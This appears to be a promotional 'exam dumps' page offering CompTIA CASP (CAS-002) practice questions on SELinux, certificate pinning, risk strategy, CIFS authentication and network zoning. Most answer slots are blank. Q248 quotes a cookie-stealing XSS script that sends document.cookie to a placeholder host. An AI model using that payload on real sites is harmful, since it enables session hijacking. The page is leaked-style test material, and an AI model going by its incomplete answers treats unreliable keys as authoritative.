★ Pass on Your First TRY ★ 100% Money Back Guarantee ★ Realistic Practice Exam Questions

Free Instant Download NEW CAS-002 Exam Dumps (PDF & VCE):
Available on: https://www.certleader.com/CAS-002-dumps.html


Highest Quality of CAS-002 brain dumps materials and preparation for CompTIA certification for candidates, Real Success Guaranteed with Updated CAS-002 pdf dumps vce Materials. 100% PASS CompTIA Advanced Security Practitioner (CASP) exam Today!

2021 Mar CAS-002 exam guide

Q241. - (Topic 4) 

A Linux security administrator is attempting to resolve performance issues with new software installed on several baselined user systems. After investigating, the security administrator determines that the software is not initializing or executing correctly. For security reasons, the company has implemented trusted operating systems with the goal of preventing unauthorized changes to the configuration baseline. The MOST likely cause of this problem is that SE Linux is set to: 

A. Enforcing mode with an incorrectly configured policy. 

B. Enforcing mode with no policy configured. 

C. Disabled with a correctly configured policy. 

D. Permissive mode with an incorrectly configured policy. 

Answer:


Q242. - (Topic 1) 

A penetration tester is assessing a mobile banking application. Man-in-the-middle attempts via a HTTP intercepting proxy are failing with SSL errors. Which of the following controls has likely been implemented by the developers? 

A. SSL certificate revocation 

B. SSL certificate pinning 

C. Mobile device root-kit detection 

D. Extended Validation certificates 

Answer:


Q243. - (Topic 1) 

The Chief Information Security Officer (CISO) at a company knows that many users store business documents on public cloud-based storage, and realizes this is a risk to the company. In response, the CISO implements a mandatory training course in which all employees are instructed on the proper use of cloud-based storage. Which of the following risk strategies did the CISO implement? 

A. Avoid 

B. Accept 

C. Mitigate 

D. Transfer 

Answer:


Q244. - (Topic 2) 

A port in a fibre channel switch failed, causing a costly downtime on the company’s primary website. Which of the following is the MOST likely cause of the downtime? 

A. The web server iSCSI initiator was down. 

B. The web server was not multipathed. 

C. The SAN snapshots were not up-to-date. 

D. The SAN replication to the backup site failed. 

Answer:


Q245. - (Topic 3) 

A company is preparing to upgrade its NIPS at five locations around the world. The three platforms the team plans to test, claims to have the most advanced features and lucrative pricing. 

Assuming all platforms meet the functionality requirements, which of the following methods should be used to select the BEST platform? 

A. Establish return on investment as the main criteria for selection. 

B. Run a cost/benefit analysis based on the data received from the RFP. 

C. Evaluate each platform based on the total cost of ownership. 

D. Develop a service level agreement to ensure the selected NIPS meets all performance requirements. 

Answer:


Update CAS-002 free practice questions:

Q246. - (Topic 4) 

A systems administrator establishes a CIFS share on a Unix device to share data to windows systems. The security authentication on the windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the Unix share. Which of the following settings on the Unix server is the cause of this problem? 

A. Refuse LM and only accept NTLMv2 

B. Accept only LM 

C. Refuse NTLMv2 and accept LM 

D. Accept only NTLM 

Answer:


Q247. - (Topic 1) 

A large hospital has implemented BYOD to allow doctors and specialists the ability to access patient medical records on their tablets. The doctors and specialists access patient records over the hospital’s guest WiFi network which is isolated from the internal network with appropriate security controls. The patient records management system can be accessed from the guest network and requires two factor authentication. Using a remote desktop type interface, the doctors and specialists can interact with the hospital’s system. Cut and paste and printing functions are disabled to prevent the copying of data to BYOD devices. Which of the following are of MOST concern? (Select TWO). 

A. Privacy could be compromised as patient records can be viewed in uncontrolled areas. 

B. Device encryption has not been enabled and will result in a greater likelihood of data loss. 

C. The guest WiFi may be exploited allowing non-authorized individuals access to confidential patient data. 

D. Malware may be on BYOD devices which can extract data via key logging and screen scrapes. 

E. Remote wiping of devices should be enabled to ensure any lost device is rendered inoperable. 

Answer: A,D 


Q248. - (Topic 1) 

A security administrator notices the following line in a server's security log: 

<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cooki e</script>') + "' 

The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack? 

A. WAF 

B. Input validation 

C. SIEM 

D. Sandboxing 

E. DAM 

Answer:


Q249. - (Topic 4) 

A system administrator has installed a new Internet facing secure web application that consists of a Linux web server and Windows SQL server into a new corporate site. The administrator wants to place the servers in the most logical network security zones and implement the appropriate security controls. Which of the following scenarios BEST accomplishes this goal? 

A. Create an Internet zone, DMZ, and Internal zone on the firewall. Place the web server in the DMZ. Configure IPtables to allow TCP 80 and 443. Set SELinux to permissive. Place the SQL server in the internal zone. Configure the Windows firewall to allow TCP 80 and 

443. Configure the Internet zone with ACLs of allow 80 and 443 destination DMZ. 

B. Create an Internet zone, DMZ, and Internal zone on the firewall. Place the web server in the DMZ. Configure IPtables to allow TCP 443. Set enforcement threshold on SELinux to one. Place the SQL server in the internal zone. Configure the Windows firewall to allow TCP 1433 and 1443. Configure the Internet zone with ACLs of allow 443 destination DMZ. 

C. Create an Internet zone and two DMZ zones on the firewall. Place the web server in the DMZ one. Set the enforcement threshold on SELinux to 100, and configure IPtables to allow TCP 80 and 443. Place the SQL server in DMZ two. Configure the Windows firewall to allow TCP 80 and 443. Configure the Internet zone with an ACL of allow 443 destination ANY. 

D. Create an Internet zone and two DMZ zones on the firewall. Place the web server in DMZ one. Set enforcement threshold on SELinux to zero, and configure IPtables to allow TCP 80 and 443. Place the SQL server in DMZ two. Configure the Internet zone ACLs with allow 80, 443, 1433, and 1443 destination ANY. 

Answer:


Q250. - (Topic 1) 

A systems administrator establishes a CIFS share on a UNIX device to share data to 

Windows systems. The security authentication on the Windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the UNIX share. Which of the following settings on the UNIX server would correct this problem? 

A. Refuse LM and only accept NTLMv2 

B. Accept only LM 

C. Refuse NTLMv2 and accept LM 

D. Accept only NTLM 

Answer: